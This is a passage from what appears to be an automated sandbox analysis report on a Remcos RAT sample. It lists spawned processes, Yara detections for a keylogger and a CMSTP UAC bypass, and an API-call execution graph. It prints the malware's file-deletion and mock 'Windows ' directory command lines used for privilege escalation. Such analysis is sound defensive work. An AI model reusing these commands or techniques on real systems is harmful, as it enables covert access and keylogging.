                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:23
                                                                    Start time:02:12:36
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 668
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:24
                                                                    Start time:02:12:37
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:26
                                                                    Start time:02:12:39
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 660
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:27
                                                                    Start time:02:12:39
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:28
                                                                    Start time:02:12:40
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\alpha.pif
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                    Imagebase:0x40000
                                                                    File size:236'544 bytes
                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:30
                                                                    Start time:02:12:42
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 676
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:31
                                                                    Start time:02:12:42
                                                                    Start date:26/11/2024
                                                                    Path:C:\Users\Public\Libraries\Wuqtggvo.PIF
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\Public\Libraries\Wuqtggvo.PIF"
                                                                    Imagebase:0x400000
                                                                    File size:1'244'672 bytes
                                                                    MD5 hash:1A4D920B70293F85958A9A2CDE581F6F
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:Borland Delphi
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:33
                                                                    Start time:02:12:44
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\SndVol.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\System32\SndVol.exe
                                                                    Imagebase:0x360000
                                                                    File size:226'712 bytes
                                                                    MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:35
                                                                    Start time:02:12:45
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 608
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:37
                                                                    Start time:02:12:50
                                                                    Start date:26/11/2024
                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1376 -s 624
                                                                    Imagebase:0x9e0000
                                                                    File size:483'680 bytes
                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:6.5%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:5.2%
                                                                      Total number of Nodes:1328
                                                                      Total number of Limit Nodes:18
                                                                      execution_graph 72599 2c94edc 72600 2c94ee9 72599->72600 72604 2c94ef0 72599->72604 72605 2c94c38 72600->72605 72611 2c94c50 72604->72611 72606 2c94c4c 72605->72606 72607 2c94c3c SysAllocStringLen 72605->72607 72606->72604 72607->72606 72608 2c94c30 72607->72608 72609 2c94f3c 72608->72609 72610 2c94f26 SysAllocStringLen 72608->72610 72609->72604 72610->72608 72610->72609 72612 2c94c5c 72611->72612 72613 2c94c56 SysFreeString 72611->72613 72613->72612 72614 2c91c6c 72615 2c91c7c 72614->72615 72616 2c91d04 72614->72616 72617 2c91c89 72615->72617 72618 2c91cc0 72615->72618 72619 2c91f58 72616->72619 72620 2c91d0d 72616->72620 72621 2c91c94 72617->72621 72662 2c91724 72617->72662 72623 2c91724 10 API calls 72618->72623 72622 2c91fec 72619->72622 72625 2c91f68 72619->72625 72626 2c91fac 72619->72626 72628 2c91d25 72620->72628 72631 2c91e24 72620->72631 72643 2c91cd7 72623->72643 72630 2c91724 10 API calls 72625->72630 72629 2c91fb2 72626->72629 72635 2c91724 10 API calls 72626->72635 72627 2c91d2c 72628->72627 72633 2c91d48 72628->72633 72637 2c91dfc 72628->72637 72648 2c91f82 72630->72648 72639 2c91e7c 72631->72639 72640 2c91e55 Sleep 72631->72640 72649 2c91e95 72631->72649 72632 2c91724 10 API calls 72652 2c91f2c 72632->72652 72641 2c91d79 Sleep 72633->72641 72654 2c91d9c 72633->72654 72634 2c91cfd 72653 2c91fc1 72635->72653 72636 2c91cb9 72642 2c91724 10 API calls 72637->72642 72638 2c91fa7 72639->72632 72639->72649 72640->72639 72644 2c91e6f Sleep 72640->72644 72645 2c91d91 Sleep 72641->72645 72641->72654 72655 2c91e05 72642->72655 72643->72634 72647 2c91a8c 8 API calls 72643->72647 72644->72631 72645->72633 72646 2c91ca1 72646->72636 72686 2c91a8c 72646->72686 72647->72634 72648->72638 72657 2c91a8c 8 API calls 72648->72657 72651 2c91e1d 72652->72649 72656 2c91a8c 8 API calls 72652->72656 72653->72638 72660 2c91a8c 8 API calls 72653->72660 72655->72651 72658 2c91a8c 8 API calls 72655->72658 72659 2c91f50 72656->72659 72657->72638 72658->72651 72661 2c91fe4 72660->72661 72663 2c91968 72662->72663 72666 2c9173c 72662->72666 72664 2c91a80 72663->72664 72665 2c91938 72663->72665 72667 2c91a89 72664->72667 72668 2c91684 VirtualAlloc 72664->72668 72669 2c91947 Sleep 72665->72669 72674 2c91986 72665->72674 72672 2c9174e 72666->72672 72677 2c917cb Sleep 72666->72677 72667->72646 72670 2c916bf 72668->72670 72671 2c916af 72668->72671 72669->72674 72675 2c9195d Sleep 72669->72675 72670->72646 72703 2c91644 72671->72703 72673 2c9175d 72672->72673 72678 2c9182c 72672->72678 72680 2c9180a Sleep 72672->72680 72673->72646 72682 2c915cc VirtualAlloc 72674->72682 72683 2c919a4 72674->72683 72675->72665 72677->72672 72679 2c917e4 Sleep 72677->72679 72685 2c91838 72678->72685 72709 2c915cc 72678->72709 72679->72666 72680->72678 72681 2c91820 Sleep 72680->72681 72681->72672 72682->72683 72683->72646 72685->72646 72687 2c91b6c 72686->72687 72688 2c91aa1 72686->72688 72689 2c916e8 72687->72689 72690 2c91aa7 72687->72690 72688->72690 72692 2c91b13 Sleep 72688->72692 72691 2c91c66 72689->72691 72696 2c91644 2 API calls 72689->72696 72693 2c91ab0 72690->72693 72695 2c91b4b Sleep 72690->72695 72700 2c91b81 72690->72700 72691->72636 72692->72690 72694 2c91b2d Sleep 72692->72694 72693->72636 72694->72688 72697 2c91b61 Sleep 72695->72697 72695->72700 72698 2c916f5 VirtualFree 72696->72698 72697->72690 72699 2c9170d 72698->72699 72699->72636 72701 2c91c00 VirtualFree 72700->72701 72702 2c91ba4 72700->72702 72701->72636 72702->72636 72704 2c91681 72703->72704 72705 2c9164d 72703->72705 72704->72670 72705->72704 72706 2c9164f Sleep 72705->72706 72707 2c91664 72706->72707 72707->72704 72708 2c91668 Sleep 72707->72708 72708->72705 72713 2c91560 72709->72713 72711 2c915d4 VirtualAlloc 72712 2c915eb 72711->72712 72712->72685 72714 2c91500 72713->72714 72714->72711 72715 2cbd2fc 72725 2c9656c 72715->72725 72719 2cbd32a 72730 2cbc35c timeSetEvent 72719->72730 72721 2cbd334 72722 2cbd342 GetMessageA 72721->72722 72723 2cbd352 72722->72723 72724 2cbd336 TranslateMessage DispatchMessageA 72722->72724 72724->72722 72726 2c96577 72725->72726 72731 2c94198 72726->72731 72729 2c942ac SysFreeString SysReAllocStringLen SysAllocStringLen 72729->72719 72730->72721 72732 2c941de 72731->72732 72733 2c943e8 72732->72733 72734 2c94257 72732->72734 72737 2c94419 72733->72737 72740 2c9442a 72733->72740 72745 2c94130 72734->72745 72750 2c9435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 72737->72750 72739 2c94423 72739->72740 72741 2c9446f FreeLibrary 72740->72741 72742 2c94493 72740->72742 72741->72740 72743 2c9449c 72742->72743 72744 2c944a2 ExitProcess 72742->72744 72743->72744 72746 2c94173 72745->72746 72747 2c94140 72745->72747 72746->72729 72747->72746 72749 2c915cc VirtualAlloc 72747->72749 72751 2c95868 72747->72751 72749->72747 72750->72739 72752 2c95878 GetModuleFileNameA 72751->72752 72753 2c95894 72751->72753 72755 2c95acc GetModuleFileNameA RegOpenKeyExA 72752->72755 72753->72747 72756 2c95b4f 72755->72756 72757 2c95b0f RegOpenKeyExA 72755->72757 72773 2c95908 12 API calls 72756->72773 72757->72756 72758 2c95b2d RegOpenKeyExA 72757->72758 72758->72756 72760 2c95bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 72758->72760 72762 2c95c0f 72760->72762 72763 2c95cf2 72760->72763 72761 2c95b74 RegQueryValueExA 72764 2c95b94 RegQueryValueExA 72761->72764 72765 2c95bb2 RegCloseKey 72761->72765 72762->72763 72767 2c95c1f lstrlenA 72762->72767 72763->72753 72764->72765 72765->72753 72768 2c95c37 72767->72768 72768->72763 72769 2c95c5c lstrcpynA LoadLibraryExA 72768->72769 72770 2c95c84 72768->72770 72769->72770 72770->72763 72771 2c95c8e lstrcpynA LoadLibraryExA 72770->72771 72771->72763 72772 2c95cc0 lstrcpynA LoadLibraryExA 72771->72772 72772->72763 72773->72761 72774 2cb3e12 74320 2c94860 72774->74320 74321 2c94871 74320->74321 74322 2c948ae 74321->74322 74323 2c94897 74321->74323 74338 2c945a0 74322->74338 74329 2c94bcc 74323->74329 74326 2c948df 74327 2c948a4 74327->74326 74343 2c94530 74327->74343 74330 2c94bd9 74329->74330 74337 2c94c09 74329->74337 74331 2c94c02 74330->74331 74333 2c94be5 74330->74333 74334 2c945a0 11 API calls 74331->74334 74349 2c92c44 11 API calls 74333->74349 74334->74337 74335 2c94bf3 74335->74327 74350 2c944dc 74337->74350 74339 2c945c8 74338->74339 74340 2c945a4 74338->74340 74339->74327 74355 2c92c10 11 API calls 74340->74355 74342 2c945b1 74342->74327 74344 2c94534 74343->74344 74347 2c94544 74343->74347 74346 2c945a0 11 API calls 74344->74346 74344->74347 74345 2c94572 74345->74326 74346->74347 74347->74345 74356 2c92c2c 11 API calls 74347->74356 74349->74335 74351 2c944fd 74350->74351 74352 2c944e2 74350->74352 74351->74335 74352->74351 74354 2c92c2c 11 API calls 74352->74354 74354->74351 74355->74342 74356->74345 74357 2cbc350 74360 2caf7c8 74357->74360 74361 2caf7d0 74360->74361 74361->74361 74362 2caf7d7 74361->74362 76794 2ca88b8 LoadLibraryW 74362->76794 74364 2caf7f1 76799 2c92ee0 QueryPerformanceCounter 74364->76799 74366 2caf7f6 74367 2caf800 InetIsOffline 74366->74367 74368 2caf80a 74367->74368 74369 2caf81b 74367->74369 74370 2c94530 11 API calls 74368->74370 74371 2c94530 11 API calls 74369->74371 74372 2caf819 74370->74372 74371->74372 74373 2c94860 11 API calls 74372->74373 74374 2caf848 74373->74374 74375 2caf850 74374->74375 74376 2caf85a 74375->74376 76802 2c947ec 74376->76802 74378 2caf873 74379 2caf87b 74378->74379 74380 2caf885 74379->74380 76817 2ca89d0 74380->76817 74383 2c94860 11 API calls 74384 2caf8ac 74383->74384 74385 2caf8b4 74384->74385 76830 2c946d4 74385->76830 76832 2ca8274 76794->76832 76796 2ca88f1 76843 2ca7d78 76796->76843 76800 2c92ef8 GetTickCount 76799->76800 76801 2c92eed 76799->76801 76800->74366 76801->74366 76803 2c94851 76802->76803 76804 2c947f0 76802->76804 76805 2c947f8 76804->76805 76806 2c94530 76804->76806 76805->76803 76807 2c94807 76805->76807 76809 2c94530 11 API calls 76805->76809 76810 2c945a0 11 API calls 76806->76810 76812 2c94544 76806->76812 76811 2c945a0 11 API calls 76807->76811 76808 2c94572 76808->74378 76809->76807 76810->76812 76814 2c94821 76811->76814 76812->76808 76880 2c92c2c 11 API calls 76812->76880 76815 2c94530 11 API calls 76814->76815 76816 2c9484d 76815->76816 76816->74378 76818 2ca89e4 76817->76818 76819 2ca81cc 17 API calls 76818->76819 76820 2ca8a1d 76819->76820 76821 2ca8274 15 API calls 76820->76821 76822 2ca8a36 76821->76822 76823 2ca7d78 18 API calls 76822->76823 76824 2ca8a95 76823->76824 76881 2ca8338 76824->76881 76827 2ca8abc 76828 2c94500 11 API calls 76827->76828 76829 2ca8ac9 76828->76829 76829->74383 76831 2c946da 76830->76831 76833 2c94530 11 API calls 76832->76833 76834 2ca8299 76833->76834 76857 2ca798c 76834->76857 76837 2c947ec 11 API calls 76838 2ca82b3 76837->76838 76839 2ca82bb GetModuleHandleW GetProcAddress GetProcAddress 76838->76839 76840 2ca82ee 76839->76840 76863 2c94500 76840->76863 76844 2c94530 11 API calls 76843->76844 76845 2ca7d9d 76844->76845 76846 2ca798c 12 API calls 76845->76846 76847 2ca7daa 76846->76847 76848 2c947ec 11 API calls 76847->76848 76849 2ca7dba 76848->76849 76869 2ca81cc 76849->76869 76852 2ca8274 15 API calls 76853 2ca7dd3 NtWriteVirtualMemory 76852->76853 76854 2ca7dff 76853->76854 76855 2c94500 11 API calls 76854->76855 76856 2ca7e0c FreeLibrary 76855->76856 76856->74364 76858 2ca799d 76857->76858 76859 2c94bcc 11 API calls 76858->76859 76862 2ca79ad 76859->76862 76860 2ca7a19 76860->76837 76862->76860 76867 2c9babc CharNextA 76862->76867 76864 2c94506 76863->76864 76865 2c9452c 76864->76865 76868 2c92c2c 11 API calls 76864->76868 76865->76796 76867->76862 76868->76864 76870 2c94530 11 API calls 76869->76870 76871 2ca81ef 76870->76871 76872 2ca798c 12 API calls 76871->76872 76873 2ca81fc 76872->76873 76874 2ca8204 GetModuleHandleA 76873->76874 76875 2ca8274 15 API calls 76874->76875 76876 2ca8215 GetModuleHandleA 76875->76876 76877 2ca8233 76876->76877 76878 2c944dc 11 API calls 76877->76878 76879 2ca7dcd 76878->76879 76879->76852 76880->76808 76882 2c94530 11 API calls 76881->76882 76883 2ca835b 76882->76883 76884 2c94860 11 API calls 76883->76884 76885 2ca837a 76884->76885 76886 2ca81cc 17 API calls 76885->76886 76887 2ca838d 76886->76887 76888 2ca8274 15 API calls 76887->76888 76889 2ca8393 FlushInstructionCache 76888->76889 76890 2ca83b9 76889->76890 76891 2c944dc 11 API calls 76890->76891 76892 2ca83c1 FreeLibrary 76891->76892 76892->76827 76893 2cb7074 76894 2c94860 11 API calls 76893->76894 76895 2cb7095 76894->76895 76896 2c947ec 11 API calls 76895->76896 76897 2cb70cc 76896->76897 76898 2ca89d0 20 API calls 76897->76898 76899 2cb70f0 76898->76899 76900 2c94860 11 API calls 76899->76900 76901 2cb7111 76900->76901 76902 2c947ec 11 API calls 76901->76902 76903 2cb7148 76902->76903 76904 2ca89d0 20 API calls 76903->76904 76905 2cb716c 76904->76905 76906 2c94860 11 API calls 76905->76906 76907 2cb718d 76906->76907 76908 2c947ec 11 API calls 76907->76908 76909 2cb71c4 76908->76909 76910 2ca89d0 20 API calls 76909->76910 76911 2cb71e8 76910->76911 76912 2c94860 11 API calls 76911->76912 76913 2cb7209 76912->76913 76914 2c947ec 11 API calls 76913->76914 76915 2cb7240 76914->76915 76916 2ca89d0 20 API calls 76915->76916 76917 2cb7264 76916->76917 76918 2c94860 11 API calls 76917->76918 76919 2cb7285 76918->76919 76920 2c947ec 11 API calls 76919->76920 76921 2cb72bc 76920->76921 76922 2ca89d0 20 API calls 76921->76922 76923 2cb72e0 76922->76923 76924 2c94860 11 API calls 76923->76924 76925 2cb731a 76924->76925 77714 2cae0f8 76925->77714 76927 2cb7349 77724 2caf214 76927->77724 76930 2c94860 11 API calls 76931 2cb7399 76930->76931 76932 2c947ec 11 API calls 76931->76932 76933 2cb73d0 76932->76933 76934 2ca89d0 20 API calls 76933->76934 76935 2cb73f4 76934->76935 76936 2c94860 11 API calls 76935->76936 76937 2cb7415 76936->76937 76938 2c947ec 11 API calls 76937->76938 76939 2cb744c 76938->76939 76940 2ca89d0 20 API calls 76939->76940 76941 2cb7470 76940->76941 76942 2c94860 11 API calls 76941->76942 76943 2cb7491 76942->76943 76944 2c947ec 11 API calls 76943->76944 76945 2cb74c8 76944->76945 76946 2ca89d0 20 API calls 76945->76946 76947 2cb74ec 76946->76947 76948 2c94860 11 API calls 76947->76948 76949 2cb750d 76948->76949 76950 2c947ec 11 API calls 76949->76950 76951 2cb7544 76950->76951 76952 2ca89d0 20 API calls 76951->76952 76953 2cb7568 76952->76953 76954 2c94860 11 API calls 76953->76954 76955 2cb7589 76954->76955 76956 2c947ec 11 API calls 76955->76956 76957 2cb75c0 76956->76957 76958 2ca89d0 20 API calls 76957->76958 76959 2cb75e4 76958->76959 76960 2c94860 11 API calls 76959->76960 76961 2cb7605 76960->76961 76962 2c947ec 11 API calls 76961->76962 76963 2cb763c 76962->76963 76964 2ca89d0 20 API calls 76963->76964 76965 2cb7660 76964->76965 76966 2c94860 11 API calls 76965->76966 76967 2cb7681 76966->76967 76968 2c947ec 11 API calls 76967->76968 76969 2cb76b8 76968->76969 76970 2ca89d0 20 API calls 76969->76970 76971 2cb76dc 76970->76971 76972 2c94860 11 API calls 76971->76972 76973 2cb76fd 76972->76973 76974 2c947ec 11 API calls 76973->76974 76975 2cb7734 76974->76975 76976 2ca89d0 20 API calls 76975->76976 76977 2cb7758 76976->76977 76978 2c94860 11 API calls 76977->76978 76979 2cb7779 76978->76979 76980 2c947ec 11 API calls 76979->76980 76981 2cb77b0 76980->76981 76982 2ca89d0 20 API calls 76981->76982 76983 2cb77d4 76982->76983 76984 2cb77e9 76983->76984 76985 2cb8318 76983->76985 76986 2c94860 11 API calls 76984->76986 76987 2c94860 11 API calls 76985->76987 76988 2cb780a 76986->76988 76989 2cb8339 76987->76989 76990 2c947ec 11 API calls 76988->76990 76991 2c947ec 11 API calls 76989->76991 76992 2cb7841 76990->76992 76993 2cb8370 76991->76993 76995 2ca89d0 20 API calls 76992->76995 76994 2ca89d0 20 API calls 76993->76994 76996 2cb8394 76994->76996 76997 2cb7865 76995->76997 76998 2c94860 11 API calls 76996->76998 76999 2c94860 11 API calls 76997->76999 77001 2cb83b5 76998->77001 77000 2cb7886 76999->77000 77002 2c947ec 11 API calls 77000->77002 77003 2c947ec 11 API calls 77001->77003 77004 2cb78bd 77002->77004 77005 2cb83ec 77003->77005 77006 2ca89d0 20 API calls 77004->77006 77007 2ca89d0 20 API calls 77005->77007 77008 2cb78e1 77006->77008 77009 2cb8410 77007->77009 77011 2c94860 11 API calls 77008->77011 77010 2c94860 11 API calls 77009->77010 77013 2cb8431 77010->77013 77012 2cb7902 77011->77012 77014 2c947ec 11 API calls 77012->77014 77015 2c947ec 11 API calls 77013->77015 77016 2cb7939 77014->77016 77017 2cb8468 77015->77017 77018 2ca89d0 20 API calls 77016->77018 77019 2ca89d0 20 API calls 77017->77019 77020 2cb795d 77018->77020 77021 2cb848c 77019->77021 77022 2c947ec 11 API calls 77020->77022 77023 2c94860 11 API calls 77021->77023 77024 2cb7975 77022->77024 77025 2cb84ad 77023->77025 77890 2ca85bc 77024->77890 77029 2c947ec 11 API calls 77025->77029 77028 2c94860 11 API calls 77030 2cb79a7 77028->77030 77031 2cb84e4 77029->77031 77032 2c947ec 11 API calls 77030->77032 77033 2ca89d0 20 API calls 77031->77033 77035 2cb79de 77032->77035 77034 2cb8508 77033->77034 77036 2cb851d 77034->77036 77037 2cb93a1 77034->77037 77041 2ca89d0 20 API calls 77035->77041 77039 2c94860 11 API calls 77036->77039 77038 2c94860 11 API calls 77037->77038 77045 2cb93c2 77038->77045 77040 2cb853e 77039->77040 77044 2cb8556 77040->77044 77042 2cb7a02 77041->77042 77043 2c94860 11 API calls 77042->77043 77048 2cb7a23 77043->77048 77047 2c947ec 11 API calls 77044->77047 77046 2c947ec 11 API calls 77045->77046 77051 2cb93f9 77046->77051 77049 2cb8575 77047->77049 77050 2c947ec 11 API calls 77048->77050 77052 2cb858d 77049->77052 77056 2cb7a5a 77050->77056 77053 2ca89d0 20 API calls 77051->77053 77054 2ca89d0 20 API calls 77052->77054 77055 2cb941d 77053->77055 77057 2cb8599 77054->77057 77058 2c94860 11 API calls 77055->77058 77060 2ca89d0 20 API calls 77056->77060 77059 2c94860 11 API calls 77057->77059 77064 2cb943e 77058->77064 77061 2cb85ba 77059->77061 77062 2cb7a7e 77060->77062 77065 2cb85c5 77061->77065 77063 2c94860 11 API calls 77062->77063 77068 2cb7a9f 77063->77068 77067 2c947ec 11 API calls 77064->77067 77066 2c947ec 11 API calls 77065->77066 77069 2cb85f1 77066->77069 77071 2cb9475 77067->77071 77070 2c947ec 11 API calls 77068->77070 77072 2cb85fc 77069->77072 77076 2cb7ad6 77070->77076 77073 2ca89d0 20 API calls 77071->77073 77074 2ca89d0 20 API calls 77072->77074 77075 2cb9499 77073->77075 77077 2cb8615 77074->77077 77078 2c94860 11 API calls 77075->77078 77080 2ca89d0 20 API calls 77076->77080 77079 2c94860 11 API calls 77077->77079 77081 2cb94ba 77078->77081 77082 2cb8636 77079->77082 77083 2cb7afa 77080->77083 77085 2c947ec 11 API calls 77081->77085 77084 2c947ec 11 API calls 77082->77084 77902 2caadf8 29 API calls 77083->77902 77090 2cb866d 77084->77090 77089 2cb94f1 77085->77089 77087 2cb7b21 77088 2c94860 11 API calls 77087->77088 77093 2cb7b42 77088->77093 77091 2ca89d0 20 API calls 77089->77091 77092 2ca89d0 20 API calls 77090->77092 77101 2cb9515 77091->77101 77094 2cb8691 77092->77094 77096 2c947ec 11 API calls 77093->77096 77095 2c947ec 11 API calls 77094->77095 77097 2cb86bd 77095->77097 77102 2cb7b79 77096->77102 77100 2cb86d5 77097->77100 77098 2cb9cf5 77099 2c94860 11 API calls 77098->77099 77106 2cb9d16 77099->77106 77104 2cb86e0 CreateProcessAsUserW 77100->77104 77101->77098 77103 2c94860 11 API calls 77101->77103 77105 2ca89d0 20 API calls 77102->77105 77115 2cb9560 77103->77115 77107 2cb876e 77104->77107 77108 2cb86f2 77104->77108 77109 2cb7b9d 77105->77109 77111 2c947ec 11 API calls 77106->77111 77110 2c94860 11 API calls 77107->77110 77112 2c94860 11 API calls 77108->77112 77113 2c94860 11 API calls 77109->77113 77119 2cb878f 77110->77119 77120 2cb9d4d 77111->77120 77114 2cb8713 77112->77114 77118 2cb7bbe 77113->77118 77117 2cb871e 77114->77117 77116 2c947ec 11 API calls 77115->77116 77125 2cb9597 77116->77125 77124 2c947ec 11 API calls 77117->77124 77121 2c947ec 11 API calls 77118->77121 77122 2c947ec 11 API calls 77119->77122 77123 2ca89d0 20 API calls 77120->77123 77132 2cb7bf5 77121->77132 77133 2cb87c6 77122->77133 77126 2cb9d71 77123->77126 77127 2cb874a 77124->77127 77129 2ca89d0 20 API calls 77125->77129 77128 2c94860 11 API calls 77126->77128 77130 2cb8755 77127->77130 77137 2cb9d92 77128->77137 77131 2cb95bb 77129->77131 77138 2ca89d0 20 API calls 77130->77138 77134 2c94860 11 API calls 77131->77134 77135 2ca89d0 20 API calls 77132->77135 77136 2ca89d0 20 API calls 77133->77136 77144 2cb95dc 77134->77144 77139 2cb7c19 77135->77139 77140 2cb87ea 77136->77140 77143 2c947ec 11 API calls 77137->77143 77138->77107 77141 2c94860 11 API calls 77139->77141 77142 2c94860 11 API calls 77140->77142 77146 2cb7c3a 77141->77146 77147 2cb880b 77142->77147 77148 2cb9dc9 77143->77148 77145 2c947ec 11 API calls 77144->77145 77152 2cb9613 77145->77152 77149 2c947ec 11 API calls 77146->77149 77150 2c947ec 11 API calls 77147->77150 77151 2ca89d0 20 API calls 77148->77151 77157 2cb7c71 77149->77157 77158 2cb8842 77150->77158 77153 2cb9ded 77151->77153 77155 2ca89d0 20 API calls 77152->77155 77154 2c94860 11 API calls 77153->77154 77162 2cb9e0e 77154->77162 77156 2cb9637 77155->77156 77159 2c94860 11 API calls 77156->77159 77160 2ca89d0 20 API calls 77157->77160 77161 2ca89d0 20 API calls 77158->77161 77166 2cb9658 77159->77166 77163 2cb7c95 77160->77163 77164 2cb8866 77161->77164 77165 2c947ec 11 API calls 77162->77165 77168 2c94860 11 API calls 77163->77168 77736 2c949f8 77164->77736 77171 2cb9e45 77165->77171 77170 2c947ec 11 API calls 77166->77170 77173 2cb7cd5 77168->77173 77169 2cb888a 77172 2c94860 11 API calls 77169->77172 77176 2cb968f 77170->77176 77174 2ca89d0 20 API calls 77171->77174 77175 2cb88b9 77172->77175 77177 2c947ec 11 API calls 77173->77177 77180 2cb9e69 77174->77180 77181 2cb88c4 77175->77181 77178 2ca89d0 20 API calls 77176->77178 77185 2cb7d0c 77177->77185 77179 2cb96b3 77178->77179 77906 2caf094 77179->77906 77186 2ca89d0 20 API calls 77180->77186 77183 2c947ec 11 API calls 77181->77183 77187 2cb88f0 77183->77187 77189 2ca89d0 20 API calls 77185->77189 77192 2cb9e9c 77186->77192 77193 2cb88fb 77187->77193 77188 2c94860 11 API calls 77194 2cb96f7 77188->77194 77190 2cb7d30 77189->77190 77191 2c94860 11 API calls 77190->77191 77200 2cb7d51 